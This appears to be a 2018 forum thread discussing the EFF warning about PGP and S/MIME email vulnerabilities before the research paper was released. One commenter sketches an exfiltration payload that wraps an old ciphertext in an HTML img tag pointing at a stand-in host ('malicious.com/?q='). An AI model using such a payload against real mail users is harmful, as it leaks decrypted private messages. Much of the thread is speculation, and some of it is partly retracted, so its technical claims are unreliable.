A new set of vulnerabilities affecting users of PGP and S/MIME
eff.org
eff.org
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031...
There are two ways to mitigate this attack
- Don't use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links.
- Use authenticated encryption.
To me this sounds strictly like a MUA issue, not a PGP/SMIME one. If that's really all it is it does seem massively overblown to me. Why not single out the broken MUA implementations instead of saying "don't decrypt emails OR YOU'LL DIE"? I mean just look at the wild speculation in this thread, nobody understood what was going on or even what was really vulnerable and what wasn't. Given the alarmist tone and the claims of "no workaround available" I was personally expecting a deep conceptual flaw in PGP/SMIME themselves. Terrible communication IMO. The parent email in the GnuPG thread seems to agree: https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031...
We'll know for sure tomorrow I suppose.
The thing is, If I am reading correctly, it seems like this kind of vulnerability seems totally predictable.
First, you need to know that each MIME email is made up of a series of subcomponents, which the email client interprets and concatenates. One subcomponent could be PGP encrypted while the next is not.
So given an old email where message X was encrypted to form a component Encr(X), simply write a new email of the form:
Part 1: <img src=http://malicious.com/?q="
Part 2: Encr(X)
Part 3: ">
Then the client might decrypt this to the message <img src="http: //malicious.com/?q=X">. Which is fine until the email client decides to automatically execute any code it happens to be given in an email, in this case, load the image.To be clear, I doubt very much that this is the attack, but it sounds like it's along these lines.
https://mastodon.social/web/statuses/100026482838593277
[1]: https://keybase.io/
EDIT: Having read a bit more I'm not so convinced that this explanation makes sense.
I wonder what kind of flaw in PGP's design could make it unsafe to decrypt incoming mails.
1. Take previous email (X) that you want to decrypt.
2. Apply transformation (this is the actual secret sauce) to previous X to get email Y.
3. Because of how Y was constructed, decrypting it causes X to be decypted.
4. Phone home with the result by using some kind of tracking pixel.
My reasoning is that they didn't talk about RCE and they didn't talk about stealing the key, and they did warn about automatic decryption, so it should be about tricking the decryptor into decrypting whatever you want for you.
Unless there's a protocol bug where the message itself can include "dump the secret key to a public keyserver on decrypt", I'm not too worried.
(I also don't use PGP for routine communications, because it's so inconvenient to use it, and due to lack of a good mobile solution. Signal, or for routine email, tls to a mail server I control is fine too.)
- by GnuPG (https://twitter.com/gnupg/status/995931083584757760)
This advice strongly suggests a side-channel attack, not anything which affects encrypted data at rest. The worst case is that PGP has a remote code execution vulnerability in the decryption step.
PGP is encryption software, whereas S/MIME is an encryption standard.
It's like saying that a vulnerability affetcts users of OpenSSL and RSA.
It looks like its rather an mail client issue than an OpenPGP implementation issue: https://twitter.com/gnupg/status/995931083584757760?s=19
One of the researchers' tweets[0] was:
> You can still disable it in the config. If use S/MIME for sensitive information, disable it for now.
which would imply that it's not remote code execution, otherwise it would be worth disabling S/MIME whether you use it for sensitive information or not.
An (older) example of expected behaviour [2].
[1] https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06032... [2] https://sourceforge.net/p/enigmail/bugs/538/#43ff
The advice they give seems to indicate that somehow a well-crafted payload can expose the secret PGP key from "tools that automatically decrypt PGP-encrypted email."
This seems to me that it is an implementation-level attack and not a protocol attack on the basis for PGP. Is anyone else getting that same thought?
1. A bug in a library any pgp implementation uses, likely allowing even remote code execution
2. A bad Interaktion with some other mail "extension"* e.g. external bodies
*With extension I mean anything added to mail in a later rfc, which isn't really an extension in the classical sense but I'm not sure what to call it otherwise
The flaws “might reveal the plaintext of encrypted emails, including encrypted emails you sent in the past,” Sebastian Schinzel, a professor of computer security at Münster University of Applied Sciences, wrote on Twitter. “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”
So folks relying on these thing for sensitive communication should do no communitcation until..??? Just trying to clarify.
The paper is being released tomorrow morning at 7am GMT so we should learn more then.
[I've removed an earlier longer version of this comment.]
You're getting downvoted with no replies because almost everybody disagrees with you but nobody can be bothered to argue your nonsensical points.
EDIT: I see now what's going on. You baited people into disagreeing with your crackpottery, you then edited-down or deleted all of your comments in this thread so that we are the ones who look like crackpots. Well played, I guess, but not the kind of conduct I've come to expect on HN.
-----
May 14th, 1918.
Attention All Users of Typewriters: Stop Using Patented "Secret Envelopes".
Recent research has demonstrated that under certain lighting conditions, "Secret Envelopes" become transparent. There are alternatives to "Secret Envelopes" and we urge you to use them instead for the time being.
-----
In which case I would not only accept the announcement, but probably toss out my secret envelopes for good, or at least until it's proven to work again.
The good news is I don't think anyone is going to make the mistake of trying to negotiate your suggestion.
Furthermore, the big is in the decryption part of pgp, so the security of the encrypted communication doesn't seem to be at risk (unless the bug can somehow be used to exfiltrate your keys).
It doesn't seem like you have the necessary knowledge about this particular bug to assert that, but the people who do are clearly stating that there's a risk of just that:
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages."
Also
"We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past."